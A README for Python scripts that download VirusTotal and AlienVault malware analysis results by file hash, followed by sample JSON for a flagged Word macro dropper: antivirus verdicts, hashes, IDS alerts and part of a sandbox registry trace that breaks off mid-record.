Online hash-based search on VirusTotal and OTX AlienVault
The Python scripts download JSON static/dynamic malware analysis results and comments for a given file hash from VirusTotal and OTX AlienVault.
Author :
LinkedIn : @Vito Lucatorto
Usage
Download VirusTotal - Static Analysis
python3 VirusTotal_static_analysis.py --file b553641092e1a15e70f1229cb9ada0a47132f054
Download VirusTotal - Dynamic Analysis
python3 VirusTotal_dynamic_analysis.py --file b553641092e1a15e70f1229cb9ada0a47132f054
Download VirusTotal - Comments
python3 VirusTotal_v3_comments.py --file b553641092e1a15e70f1229cb9ada0a47132f054
Download AlienVault - Static & Dynamic
python3 AlienVault_analysis.py --file b553641092e1a15e70f1229cb9ada0a47132f054
Requirements
- Python 3.7 or higher
- Internet connection (proxy supported; an SSL/TLS-intercepting proxy can break the HTTPS API calls)
Get the API Keys
Virustotal
- Create an account here https://www.virustotal.com/#/join-us
- Check `Profile > My API key` for your public API key
OTX AlienVault
- Create an account here: [https://otx.alienvault.com/](https://otx.alienvault.com/)
- Check `API Integration` here: [https://otx.alienvault.com/api](https://otx.alienvault.com/api)
JSON Results
VirusTotal_static_analysis.py
"data":{
"attributes":{
"type_description":"Office Open XML Document",
"tlsh":"T1DD72BE15C714BC1CD9E08B79806503EDFA0E0153E29556AE3425EAECEB94EAB173DCCE",
"vhash":"6d43f7e34f30cafecd8113b3e404db05",
"trid":[
{
"file_type":"Word Microsoft Office Open XML Format document (with Macro)",
"probability":53
},
{
"file_type":"Word Microsoft Office Open XML Format document",
"probability":23.9
},
{
"file_type":"Open Packaging Conventions container",
"probability":17.8
},
{
"file_type":"ZIP compressed archive",
"probability":4
},
{
"file_type":"PrintFox/Pagefox bitmap (640x800)",
"probability":1
}
],
"creation_date":1606752060,
"names":[
"iencli12.dotm"
],
"last_modification_date":1613479881,
"type_tag":"docx",
"times_submitted":1,
"total_votes":{
"harmless":0,
"malicious":0
},
"size":16636,
"popular_threat_classification":{
"suggested_threat_label":"trojan.msoffice/sload",
"popular_threat_category":[
[
"trojan",
17
],
[
"dropper",
4
]
],
"popular_threat_name":[
[
"msoffice",
3
],
[
"sload",
3
],
[
"w97m",
2
]
]
},
"last_submission_date":1607467413,
"meaningful_name":"iencli12.dotm",
"crowdsourced_ids_stats":{
"info":0,
"high":0,
"medium":2,
"low":0
},
"sandbox_verdicts":{
"C2AE":{
"category":"undetected",
"sandbox_name":"C2AE",
"malware_classification":[
"UNKNOWN_VERDICT"
]
},
"Yomi Hunter":{
"category":"malicious",
"sandbox_name":"Yomi Hunter",
"malware_classification":[
"MALWARE"
]
}
},
"sha256":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"type_extension":"docx",
"tags":[
"open-file",
"exe-pattern",
"url-pattern",
"docx",
"macros",
"hide-app",
"create-ole"
],
"crowdsourced_ids_results":[
{
"rule_category":"Potentially Bad Traffic",
"alert_severity":"medium",
"alert_context":[
{
"src_ip":"10.10.0.121",
"protocol":"IP"
}
],
"rule_msg":"DECODE_IP_OPTION_SET",
"rule_source":"snort",
"rule_id":"444"
},
{
"rule_category":"Attempted Information Leak",
"alert_severity":"medium",
"alert_context":[
{
"src_ip":"10.10.0.121",
"protocol":"UDP",
"src_port":51706
}
],
"rule_msg":"PSNG_UDP_PORTSWEEP_FILTERED",
"rule_source":"snort",
"rule_id":"23"
}
],
"last_analysis_date":1607652080,
"unique_sources":1,
"first_submission_date":1607467413,
"ssdeep":"192:HNmtT7KlBpGK6SICieyOA8MS48TuX63hOZ73Ea5l/aZTbYh7e++9dQEwPwS7mZNq:tmtvKBvnpDALoa5lahYY+ISJkm",
"bundle_info":{
"highest_datetime":"1980-01-01 00:00:00",
"lowest_datetime":"1980-01-01 00:00:00",
"num_children":14,
"extensions":{
"xml":10,
"bin":1
},
"file_types":{
"XML":13,
"Microsoft Office":1
},
"type":"DOCX",
"uncompressed_size":62573
},
"md5":"aa37daeedf69b6d26081c1d6ae5a19c3",
"sha1":"b553641092e1a15e70f1229cb9ada0a47132f054",
"magic":"Zip archive data, at least v2.0 to extract",
"last_analysis_stats":{
"harmless":0,
"type-unsupported":10,
"suspicious":0,
"confirmed-timeout":0,
"timeout":0,
"failure":0,
"malicious":31,
"undetected":35
},
"last_analysis_results":{
"Bkav":{
"category":"undetected",
"engine_name":"Bkav",
"engine_version":"1.3.0.9899",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Elastic":{
"category":"malicious",
"engine_name":"Elastic",
"engine_version":"4.0.13",
"result":"malicious (high confidence)",
"method":"blacklist",
"engine_update":"20201204"
},
"Cynet":{
"category":"malicious",
"engine_name":"Cynet",
"engine_version":"4.0.0.24",
"result":"Malicious (score: 85)",
"method":"blacklist",
"engine_update":"20201211"
},
"FireEye":{
"category":"malicious",
"engine_name":"FireEye",
"engine_version":"32.36.1.0",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201210"
},
"CAT-QuickHeal":{
"category":"undetected",
"engine_name":"CAT-QuickHeal",
"engine_version":"14.00",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"ALYac":{
"category":"undetected",
"engine_name":"ALYac",
"engine_version":"1.1.1.5",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Malwarebytes":{
"category":"undetected",
"engine_name":"Malwarebytes",
"engine_version":"3.6.4.335",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Zillya":{
"category":"undetected",
"engine_name":"Zillya",
"engine_version":"2.0.0.4242",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"AegisLab":{
"category":"malicious",
"engine_name":"AegisLab",
"engine_version":"4.2",
"result":"Trojan.MSOffice.SLoad.a!c",
"method":"blacklist",
"engine_update":"20201211"
},
"Paloalto":{
"category":"type-unsupported",
"engine_name":"Paloalto",
"engine_version":"1.0",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Sangfor":{
"category":"undetected",
"engine_name":"Sangfor",
"engine_version":"1.0",
"result":null,
"method":"blacklist",
"engine_update":"20201207"
},
"Trustlook":{
"category":"undetected",
"engine_name":"Trustlook",
"engine_version":"1.0",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Alibaba":{
"category":"malicious",
"engine_name":"Alibaba",
"engine_version":"0.3.0.5",
"result":"TrojanDownloader:VBA/Obfuscation.A",
"method":"blacklist",
"engine_update":"20190527"
},
"K7GW":{
"category":"undetected",
"engine_name":"K7GW",
"engine_version":"11.155.35944",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"K7AntiVirus":{
"category":"undetected",
"engine_name":"K7AntiVirus",
"engine_version":"11.155.35943",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Arcabit":{
"category":"malicious",
"engine_name":"Arcabit",
"engine_version":"1.0.0.881",
"result":"Trojan.Generic.D2AD801C",
"method":"blacklist",
"engine_update":"20201210"
},
"BitDefenderTheta":{
"category":"undetected",
"engine_name":"BitDefenderTheta",
"engine_version":"7.2.37796.0",
"result":null,
"method":"blacklist",
"engine_update":"20201202"
},
"Cyren":{
"category":"malicious",
"engine_name":"Cyren",
"engine_version":"6.3.0.2",
"result":"Trojan.RZRC-5",
"method":"blacklist",
"engine_update":"20201211"
},
"SymantecMobileInsight":{
"category":"type-unsupported",
"engine_name":"SymantecMobileInsight",
"engine_version":"2.0",
"result":null,
"method":"blacklist",
"engine_update":"20200813"
},
"Symantec":{
"category":"malicious",
"engine_name":"Symantec",
"engine_version":"1.13.0.0",
"result":"Trojan.Gen.NPE",
"method":"blacklist",
"engine_update":"20201210"
},
"TotalDefense":{
"category":"undetected",
"engine_name":"TotalDefense",
"engine_version":"37.1.62.1",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Baidu":{
"category":"undetected",
"engine_name":"Baidu",
"engine_version":"1.0.0.2",
"result":null,
"method":"blacklist",
"engine_update":"20190318"
},
"TrendMicro-HouseCall":{
"category":"malicious",
"engine_name":"TrendMicro-HouseCall",
"engine_version":"10.0.0.1040",
"result":"Trojan.W97M.POWLOAD.THLOIBO",
"method":"blacklist",
"engine_update":"20201210"
},
"Avast":{
"category":"malicious",
"engine_name":"Avast",
"engine_version":"21.1.5827.0",
"result":"Other:Malware-gen [Trj]",
"method":"blacklist",
"engine_update":"20201210"
},
"ClamAV":{
"category":"undetected",
"engine_name":"ClamAV",
"engine_version":"0.102.3.0",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Kaspersky":{
"category":"malicious",
"engine_name":"Kaspersky",
"engine_version":"15.0.1.13",
"result":"HEUR:Trojan-Downloader.MSOffice.SLoad.gen",
"method":"blacklist",
"engine_update":"20201210"
},
"BitDefender":{
"category":"malicious",
"engine_name":"BitDefender",
"engine_version":"7.2",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201211"
},
"NANO-Antivirus":{
"category":"undetected",
"engine_name":"NANO-Antivirus",
"engine_version":"1.0.146.25241",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"SUPERAntiSpyware":{
"category":"undetected",
"engine_name":"SUPERAntiSpyware",
"engine_version":"5.6.0.1032",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"MicroWorld-eScan":{
"category":"malicious",
"engine_name":"MicroWorld-eScan",
"engine_version":"14.0.409.0",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201210"
},
"APEX":{
"category":"type-unsupported",
"engine_name":"APEX",
"engine_version":"6.107",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Rising":{
"category":"malicious",
"engine_name":"Rising",
"engine_version":"25.0.0.26",
"result":"Dropper.Agent!8.2F (TOPIS:E0:SNE7OOM2KTI)",
"method":"blacklist",
"engine_update":"20201211"
},
"Ad-Aware":{
"category":"malicious",
"engine_name":"Ad-Aware",
"engine_version":"3.0.16.117",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201211"
},
"Sophos":{
"category":"undetected",
"engine_name":"Sophos",
"engine_version":"1.0.2.0",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Comodo":{
"category":"undetected",
"engine_name":"Comodo",
"engine_version":"33066",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"F-Secure":{
"category":"malicious",
"engine_name":"F-Secure",
"engine_version":"12.0.86.52",
"result":"Malware.VBS/Drop.Agent.lepeo",
"method":"blacklist",
"engine_update":"20201210"
},
"DrWeb":{
"category":"undetected",
"engine_name":"DrWeb",
"engine_version":"7.0.49.9080",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"VIPRE":{
"category":"undetected",
"engine_name":"VIPRE",
"engine_version":"88836",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"TrendMicro":{
"category":"malicious",
"engine_name":"TrendMicro",
"engine_version":"11.0.0.1006",
"result":"Trojan.W97M.POWLOAD.THLOIBO",
"method":"blacklist",
"engine_update":"20201210"
},
"McAfee-GW-Edition":{
"category":"malicious",
"engine_name":"McAfee-GW-Edition",
"engine_version":"v2019.1.2+3728",
"result":"BehavesLike.Downloader.lc",
"method":"blacklist",
"engine_update":"20201211"
},
"Trapmine":{
"category":"type-unsupported",
"engine_name":"Trapmine",
"engine_version":"3.5.0.1023",
"result":null,
"method":"blacklist",
"engine_update":"20200727"
},
"CMC":{
"category":"undetected",
"engine_name":"CMC",
"engine_version":"2.10.2019.1",
"result":null,
"method":"blacklist",
"engine_update":"20201204"
},
"Emsisoft":{
"category":"malicious",
"engine_name":"Emsisoft",
"engine_version":"2018.12.0.1641",
"result":"Trojan.GenericKD.44924956 (B)",
"method":"blacklist",
"engine_update":"20201211"
},
"Ikarus":{
"category":"malicious",
"engine_name":"Ikarus",
"engine_version":"0.1.5.2",
"result":"Trojan-Dropper.VBA.Agent",
"method":"blacklist",
"engine_update":"20201210"
},
"Avast-Mobile":{
"category":"undetected",
"engine_name":"Avast-Mobile",
"engine_version":"201210-00",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Jiangmin":{
"category":"undetected",
"engine_name":"Jiangmin",
"engine_version":"16.0.100",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Webroot":{
"category":"type-unsupported",
"engine_name":"Webroot",
"engine_version":"1.0.0.403",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Avira":{
"category":"malicious",
"engine_name":"Avira",
"engine_version":"8.3.3.10",
"result":"VBS/Drop.Agent.lepeo",
"method":"blacklist",
"engine_update":"20201211"
},
"eGambit":{
"category":"type-unsupported",
"engine_name":"eGambit",
"engine_version":null,
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Antiy-AVL":{
"category":"undetected",
"engine_name":"Antiy-AVL",
"engine_version":"3.0.0.1",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Kingsoft":{
"category":"undetected",
"engine_name":"Kingsoft",
"engine_version":"2017.9.26.565",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Gridinsoft":{
"category":"malicious",
"engine_name":"Gridinsoft",
"engine_version":"1.0.20.110",
"result":"Trojan.U.Downloader.oa",
"method":"blacklist",
"engine_update":"20201210"
},
"Microsoft":{
"category":"undetected",
"engine_name":"Microsoft",
"engine_version":"1.1.17700.4",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"ViRobot":{
"category":"malicious",
"engine_name":"ViRobot",
"engine_version":"2014.3.20.0",
"result":"DOC.Z.Agent.16636",
"method":"blacklist",
"engine_update":"20201210"
},
"ZoneAlarm":{
"category":"malicious",
"engine_name":"ZoneAlarm",
"engine_version":"1.0",
"result":"HEUR:Trojan-Downloader.MSOffice.SLoad.gen",
"method":"blacklist",
"engine_update":"20201210"
},
"GData":{
"category":"malicious",
"engine_name":"GData",
"engine_version":"A:25.27963B:27.21181",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201210"
},
"TACHYON":{
"category":"undetected",
"engine_name":"TACHYON",
"engine_version":"2020-12-11.01",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"BitDefenderFalx":{
"category":"type-unsupported",
"engine_name":"BitDefenderFalx",
"engine_version":"2.0.936",
"result":null,
"method":"blacklist",
"engine_update":"20200916"
},
"AhnLab-V3":{
"category":"undetected",
"engine_name":"AhnLab-V3",
"engine_version":"3.19.3.10105",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Acronis":{
"category":"undetected",
"engine_name":"Acronis",
"engine_version":"1.1.1.80",
"result":null,
"method":"blacklist",
"engine_update":"20201023"
},
"McAfee":{
"category":"malicious",
"engine_name":"McAfee",
"engine_version":"6.0.6.653",
"result":"RDN/Generic Downloader.x",
"method":"blacklist",
"engine_update":"20201210"
},
"MAX":{
"category":"malicious",
"engine_name":"MAX",
"engine_version":"2019.9.16.1",
"result":"malware (ai score=87)",
"method":"blacklist",
"engine_update":"20201211"
},
"VBA32":{
"category":"undetected",
"engine_name":"VBA32",
"engine_version":"4.4.1",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Cylance":{
"category":"type-unsupported",
"engine_name":"Cylance",
"engine_version":"2.3.1.101",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Zoner":{
"category":"undetected",
"engine_name":"Zoner",
"engine_version":"0.0.0.0",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"ESET-NOD32":{
"category":"malicious",
"engine_name":"ESET-NOD32",
"engine_version":"22461",
"result":"a variant of VBA/TrojanDropper.Agent.BRD",
"method":"blacklist",
"engine_update":"20201210"
},
"Tencent":{
"category":"undetected",
"engine_name":"Tencent",
"engine_version":"1.0.0.1",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Yandex":{
"category":"undetected",
"engine_name":"Yandex",
"engine_version":"5.5.2.24",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"SentinelOne":{
"category":"undetected",
"engine_name":"SentinelOne",
"engine_version":"4.7.0.7",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"MaxSecure":{
"category":"undetected",
"engine_name":"MaxSecure",
"engine_version":"1.0.0.1",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Fortinet":{
"category":"malicious",
"engine_name":"Fortinet",
"engine_version":"6.2.142.0",
"result":"VBA/Agent.GBWDLEV!tr.dldr",
"method":"blacklist",
"engine_update":"20201210"
},
"AVG":{
"category":"malicious",
"engine_name":"AVG",
"engine_version":"21.1.5827.0",
"result":"Other:Malware-gen [Trj]",
"method":"blacklist",
"engine_update":"20201210"
},
"Cybereason":{
"category":"type-unsupported",
"engine_name":"Cybereason",
"engine_version":"1.2.449",
"result":null,
"method":"blacklist",
"engine_update":"20190616"
},
"Panda":{
"category":"undetected",
"engine_name":"Panda",
"engine_version":"4.6.4.2",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"CrowdStrike":{
"category":"type-unsupported",
"engine_name":"CrowdStrike",
"engine_version":"1.0",
"result":null,
"method":"blacklist",
"engine_update":"20190702"
},
"Qihoo-360":{
"category":"malicious",
"engine_name":"Qihoo-360",
"engine_version":"1.0.0.1120",
"result":"Generic/Trojan.Downloader.3f4",
"method":"blacklist",
"engine_update":"20201211"
}
},
"reputation":0
},
"type":"file",
"id":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"links":{
"self":"https://www.virustotal.com/api/v3/files/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c"
}
}
VirusTotal_dynamic_analysis.py
{
"meta":{
"count":2
},
"data":[
{
"attributes":{
"verdicts":[
"UNKNOWN_VERDICT"
],
"command_executions":[
"\"%ProgramFiles(x86)%\\Microsoft Office\\Office14\\WINWORD.EXE\" %SAMPLEPATH%"
],
"registry_keys_set":[
{
"value":"LowDateTime:-331231481,HighDateTime:30676316***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\ndis.sys[MofResourceName]"
},
{
"value":"LowDateTime:418629328,HighDateTime:30487037***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\System32\\Drivers\\portcls.SYS[PortclsMof]"
},
{
"value":"LowDateTime:1237199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]"
},
{
"value":"LowDateTime:-227274444,HighDateTime:30116024***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\HDAudBus.sys[HDAudioMofName]"
},
{
"value":"LowDateTime:1137199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\System32\\Drivers\\en-US\\portcls.SYS.mui[PortclsMof]"
},
{
"value":"LowDateTime:302488720,HighDateTime:30778805***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\advapi32.dll[MofResourceName]"
},
{
"value":"LowDateTime:369951187,HighDateTime:30778805***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\en-US\\advapi32.dll.mui[MofResourceName]"
},
{
"value":"LowDateTime:1497199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]"
},
{
"value":"LowDateTime:-377767680,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\en-US\\HDAudBus.sys.mui[HDAudioMofName]"
},
{
"value":"LowDateTime:382232320,HighDateTime:30016580***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\ndis.sys.mui[MofResourceName]"
},
{
"value":"LowDateTime:-577767680,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\en-US\\intelppm.sys.mui[PROCESSORWMI]"
},
{
"value":"LowDateTime:803713417,HighDateTime:0***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\IDE\\DiskAMDX_HARDDISK___________________________2.5+____\\5&2770a7af&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910}"
},
{
"value":"LowDateTime:-445445610,HighDateTime:30778799***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\intelppm.sys[PROCESSORWMI]"
},
{
"value":"LowDateTime:398767260,HighDateTime:30646967***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\ACPI.sys[ACPIMOFResource]"
},
{
"value":"LowDateTime:-1637837527,HighDateTime:30762899***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\monitor.sys[MonitorWMI]"
},
{
"value":"LowDateTime:-649833737,HighDateTime:30733938***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\mssmbios.sys[MofResource]"
},
{
"value":"26507113",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\Trusted Documents\\LastPurgeTime"
},
{
"value":"4C 00 00 00 A3 01 00 00 01 00 00 00 02 01 FF FF BD 00 00 00 00 00 00 00 00 00 10 00 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 01 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 1B 00 00 00 01 00 42 72",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Data\\Toolbars"
},
{
"value":"PCI\\VEN_8086&DEV_100E&SUBSYS_11001AF4&REV_03\\3&13C0B0C5&0&90",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\{B5DA8633-954C-4495-AE46-0BB5B5FB1CDC}\\Connection\\PnpInstanceID"
},
{
"value":"Global\\MMF_BITS_s",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\BITS\\Performance\\PerfMMFileName"
},
{
"value":"1",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{ad498944-762f-11d0-8dcb-00c04fc3358c}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\\Control\\Linked"
},
{
"value":"\\\\?\\SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\{78032B7E-4968-42D3-9F37-287EA86C0AAA}",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{ad498944-762f-11d0-8dcb-00c04fc3358c}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\\SymbolicLink"
},
{
"value":"1",
"key":"HKLM\\Software\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading"
},
{
"value":"00 00 54 00 45 00 76 00 65 00 6E 00 74 00 4C 00 6F 00 67 00 45 00 76 00 65 00 6E 00 74 00 43 00 6F 00 6E 00 73 00 75 00 6D 00 65 00 72 00",
"key":"HKLM\\Software\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces"
},
{
"value":"%windir%\\System32\\Bits.log\n",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_LOG"
},
{
"value":"%windir%\\System32\\Bits.bak\n",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_BAK"
},
{
"value":"6F 3E 2B 00 54 0A 00 00 06 00 00 00 01 00 00 00 4A 00 00 00 02 00 00 00 3A 00 00 00 04 00 00 00 63 00 3A 00 5C 00 74 00 6D 00 70 00 5C 00 7A 00 37 00 67 00 72 00 73 00 37 00 6D 00 71 00 75 00 6F 00 6C 00 70 00 7A 00 62 00 31 00 6C 00 2E 00 64 00 6F 00 63 00 6D 00 00 00 00 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems\\o>+"
},
{
"value":"6D 39 2B 00 54 0A 00 00 01 00 00 00 00 00 00 00 00 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems\\m9+"
},
{
"value":"38 3A 2B 00 54 0A 00 00 04 00 00 00 00 00 00 00 8E 00 00 00 01 00 00 00 86 00 00 00 3F 00 43 00 3A 00 5C 00 55 00 73 00 65 00 72 00 73 00 5C 00 57 00 41 00 4C 00 4B 00 45 00 52 00 5C 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5C 00 52 00 6F 00 61 00 6D 00 69 00 6E 00 67 00 5C 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 5C 00 54 00 65 00 6D 00 70 00 6C 00 61 00 74 00 65 00 73 00 5C 00 4E 00 6F 00 72 00 6D 00 61 00 6C 00 2E 00 64 00 6F 00 74 00 6D 00 00 00 00 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems\\8:+"
},
{
"value":"12642",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Last Counter"
},
{
"value":"12476 12482 12492 12502 12522 12566 12576 12614 12620 12636",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Object List"
},
{
"value":"12643",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Last Help"
},
{
"value":"12476",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\First Counter"
},
{
"value":"12477",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\First Help"
},
{
"value":"WmiApRpl.ini\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\PerfIniFile"
},
{
"value":"SW\\{eeab7790-c514-11d1-b42b-00805fc1270e}\\asyncmac",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{cac88484-7515-4c03-82e6-71a87abac361}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\\DeviceInstance"
},
{
"value":"1",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{ad498944-762f-11d0-8dcb-00c04fc3358c}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\Control\\ReferenceCount"
},
{
"value":"A0 05 00 00 A0 0A A8 86 B7 32 D6 01 00 00 00 00 54 0A 00 00 60 7A A9 AF B7 32 D6 01 00 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\MTTT"
},
{
"value":"1",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\\AutoDetect"
},
{
"value":"0",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\\UNCAsIntranet"
},
{
"value":"On",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Common\\LanguageResources\\EnabledLanguages\\1033"
},
{
"value":"1",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{cac88484-7515-4c03-82e6-71a87abac361}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\\#\\Control\\Linked"
},
{
"value":"en-US\nen\n",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000_CLASSES\\Local Settings\\MuiCache\\17b\\52C64B7E\\LanguageList"
},
{
"value":"\\\\?\\SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}",
